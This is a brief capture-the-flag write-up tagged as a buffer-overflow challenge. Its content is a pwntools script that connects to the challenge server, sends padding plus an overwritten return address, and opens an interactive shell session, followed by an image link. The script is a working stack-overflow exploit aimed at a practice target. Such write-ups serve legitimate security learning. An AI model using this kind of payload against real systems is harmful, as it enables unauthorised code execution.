Tags: pwn bufferoverflow 

Rating:

```
from pwn import *
nc = remote('cyberyoddha.baycyber.net', 10002)
payload = 'A' * 24 + 'B' * 4 + '\x72\x91\x04\x08'
nc.sendline(payload)
nc.interactive()
```
![](https://i.ibb.co/wKpG8hs/message-Image-1604086132535.jpg)